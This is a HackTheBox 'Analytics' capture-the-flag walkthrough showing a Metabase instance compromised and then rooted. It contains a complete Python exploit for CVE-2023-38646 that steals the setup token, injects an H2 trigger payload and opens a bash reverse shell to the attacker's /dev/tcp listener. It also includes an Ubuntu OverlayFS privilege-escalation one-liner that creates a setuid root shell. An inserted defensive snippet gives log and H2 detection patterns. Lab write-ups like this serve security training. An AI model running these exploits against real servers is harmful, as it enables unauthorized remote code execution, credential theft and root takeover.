# Analytics

## Overview

Greetings everyone,

In this write-up, we will tackle Analytics from HackTheBox.

Machine link: [Analytics Machine](https://app.hackthebox.com/machines/Analytics)

Difficulty Level: Easy

Let's Begin 🙌

Firstly, connect to the HTB server using the OpenVPN configuration file generated by HTB.  [Click Here](https://help.hackthebox.com/en/articles/5185687-introduction-to-lab-access) to learn more about how to connect to VPN and access the boxes.

Once connected to the VPN service, click on "Join Machine" to access the machine's IP.

Upon joining the machine, you will be able to view the IP address of the target machine.

***

## Reconnaissance

### Rust Scan

`rustscan --range=1-65535 --ulimit 5000 -a <TARGET_IP> -- -A -T4 -v -Pn`

<figure><img src="/files/cEWE5rcvQffsKkvANgPS" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/j97kFyUpYrt5Vj1nyz2d" alt=""><figcaption></figcaption></figure>

### Results

| Ports | Services | Service Version |
| ----- | -------- | --------------- |
| 22    | SSH      | OpenSSH 8.9p1   |
| 80    | HTTP     | nginx 1.18.0    |

***

## Information Gathering - analytical.htb

First, let's take a look at the website running on port 80.

When we try to view port 80, the server redirects to the domain `analytical.htb`. To access the website, we therefore need to append an entry to the `/etc/hosts` file mapping that domain to the target IP address.

Command: `sudo vim /etc/hosts`

<figure><img src="/files/jiCZJUyA6VdhmOP4dIMy" alt=""><figcaption></figcaption></figure>

Now we have access to the website. I used `Wappalyzer` to check the technologies employed, but nothing of particular interest was discovered.

<figure><img src="/files/0hXmavgX0UU4rWhmPe1q" alt=""><figcaption></figcaption></figure>

When I clicked the login button in the top right corner of the webpage, it redirected me to the subdomain `data.analytical.htb`. To access it, you need to append another entry to the `/etc/hosts` file.

<figure><img src="/files/Us55QNPUQiy3oCVE5hXq" alt=""><figcaption></figcaption></figure>

Now, we can access the website. The website hosted on `data.analytical.htb` is a Metabase login page. Metabase is an open-source business intelligence tool that allows you to connect to many popular databases.

<figure><img src="/files/bR3KwMdCr8S7GqfG1ecs" alt=""><figcaption></figcaption></figure>

## CVE-2023-38646

I began searching for recent exploits and vulnerabilities related to Metabase and came across this: <https://www.assetnote.io/resources/research/chaining-our-way-to-pre-auth-rce-in-metabase-cve-2023-38646>.

As mentioned in the article, I verified whether `/api/session/properties` is accessible, and indeed, it was.

<figure><img src="/files/8c3eShbhyANjRdUlDd14" alt=""><figcaption></figcaption></figure>

Next, I searched for the setup-token in the `/api/session/properties` page. I copied the content of the page and pasted it into a JSON beautifier, where I located the setup-token. I utilized the following JSON beautifier website: <https://codebeautify.org/jsonviewer>.

<figure><img src="/files/7O3oAwgmfIstfh817IiB" alt=""><figcaption></figcaption></figure>

## Initial Access

An exposed `setup-token` indicates that this Metabase instance is vulnerable to pre-authentication Remote Code Execution (RCE). I crafted a Python script based on the Proof of Concept (PoC) in the article above, along with references from other PoCs for the same vulnerability. The script retrieves the `setup-token` from `/api/session/properties` and sends a POST request to `/api/setup/validate` carrying an H2 connection string that triggers the RCE, establishing a reverse shell back to the attacker's machine.

```python
import base64
from string import ascii_uppercase
import requests
import random

localhost = '10.10.16.10'  # HTB VPN TUNNEL IP

listening_port = '9001'  # Netcat listener port

response1 = requests.get("http://data.analytical.htb/api/session/properties")

setup_token = response1.json()['setup-token']

reverse_shell = f'bash -i >&/dev/tcp/{localhost}/{listening_port} 0>&1'

def encode_command_to_b64(payload: str) -> str:
    encoded_payload = base64.b64encode(payload.encode('ascii')).decode()
    equals_count = encoded_payload.count('=')

    if equals_count >= 1:
        encoded_payload = base64.b64encode(f'{payload + " " * equals_count}'.encode('ascii')).decode()

    return encoded_payload

command = encode_command_to_b64(reverse_shell)

url = f'http://data.analytical.htb/api/setup/validate'

headers = {
    "Content-Type": "application/json",
    "Connection": "close"
}

payload = {
    "token": setup_token,
    "details": {
        "details": {
            "db": "zip:/app/metabase.jar!/sample-database.db;TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER {random_string} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {{echo,{command}}}|{{base64,-d}}|{{bash,-i}}')\n$$--=x".format(
                random_string=''.join(random.choice(ascii_uppercase) for i in range(12)), command=command),
            "advanced-options": False,
            "ssl": True
        },
        "name": "x",
        "engine": "h2"
    }
}

request = requests.post(url, json=payload, headers=headers)
```
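From the defender's side, the request sequence used above (a GET to `/api/session/properties` followed by a POST to `/api/setup/validate` whose H2 connection string carries a trigger definition) is easy to spot on the nginx front end. The following is an added detection example, not code from the original write-up; the access-log lines and request bodies it inspects are constructed samples.

```python
import json
import re

# Constructed nginx access-log sample (not from the write-up). Metabase's setup
# endpoints should only see traffic during first-run setup, never afterwards.
SAMPLE_ACCESS_LOG = """\
10.10.14.5 - - [04/Oct/2023:10:01:02 +0000] "GET /api/session/properties HTTP/1.1" 200 14123
10.10.14.5 - - [04/Oct/2023:10:01:09 +0000] "POST /api/setup/validate HTTP/1.1" 400 57
10.10.14.7 - - [04/Oct/2023:10:02:44 +0000] "GET /api/user/current HTTP/1.1" 200 812
"""

# Constructed request bodies: one benign validation request and one whose H2
# connection string defines a trigger on a system table (the CVE-2023-38646 shape).
SAMPLE_OK_BODY = json.dumps({"details": {"details": {"db": "mem:reports"}, "engine": "h2"}})
SAMPLE_BAD_BODY = json.dumps({"details": {"details": {
    "db": "mem:x;INIT=CREATE TRIGGER t BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$ $$"},
    "engine": "h2"}})

# nginx "combined" format: ip ident user [time] "method path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Fragments that have no place in a legitimate H2 connection string submitted
# for validation: SQL run on connect, trigger creation, and script execution.
H2_SUSPICIOUS = [r'(?i)INIT\s*=', r'(?i)CREATE\s+TRIGGER', r'//javascript', r'(?i)RUNSCRIPT']


def suspicious_setup_requests(log_text: str) -> list[dict]:
    """Return parsed entries that POST to the setup endpoint, whatever the status.

    Even a 400 response matters: the token check failing is still evidence that
    someone is probing a setup endpoint that should be dead after installation.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and m['method'] == 'POST' and m['path'].startswith('/api/setup/validate'):
            hits.append(m.groupdict())
    return hits


def h2_connection_string_is_suspicious(body: str) -> bool:
    """Flag a validation request body whose H2 'db' string carries hostile syntax."""
    try:
        db = json.loads(body)['details']['details']['db']
    except (ValueError, KeyError, TypeError):
        return False  # not a Metabase validate body; nothing to judge here
    return any(re.search(pattern, db) for pattern in H2_SUSPICIOUS)
```

Pairing the two checks (setup-endpoint traffic from the access log, trigger or INIT syntax in the body at a reverse proxy or WAF) catches the exploit attempt regardless of whether the setup token was still valid.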

Before executing the script, initiate a netcat listener on port 9001.

<figure><img src="/files/x0j0RxVokvatiOtzjn4L" alt=""><figcaption></figcaption></figure>

Now, execute the Python script and monitor the netcat listener. You will observe that you receive a connection back from the target machine. Upon further exploration of the machine, I discovered linpeas in the home directory. However, running it did not yield any privilege escalation vectors. Therefore, I continued searching for alternative avenues. I inspected the environment variables of the target machine, from which I obtained a username and password.

<figure><img src="/files/LpnLVcQxoKnr76Jw0qXb" alt=""><figcaption></figcaption></figure>

Since SSH is running on the target machine, I attempted to log in using the credentials we obtained, and to my satisfaction, it worked.

<figure><img src="/files/lgUboZsb8mSXp42zInzc" alt=""><figcaption></figcaption></figure>

## Getting the User Flag

<figure><img src="/files/juZ8kpjPdtLjpf03rav5" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

I tried the usual privilege escalation vectors, but none of them worked. As the next step in the investigation, I identified the kernel version.

<figure><img src="/files/uCtmqLyzr5tUDRzHJFEg" alt=""><figcaption></figcaption></figure>

I began searching for exploits targeting the identified kernel version and came across this: <https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629>.

I examined the `exploit.sh` file in that repository. It contains a single line of code that performs the privilege escalation, which I copied and executed. The code is reproduced below:

```bash
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
```

## Getting the Root Flag

I executed the code, and to my satisfaction, it successfully completed the privilege escalation, granting me access to the root flag.

<figure><img src="/files/tnjQVL5DSBharJq23KPV" alt=""><figcaption></figcaption></figure>

Thank You....
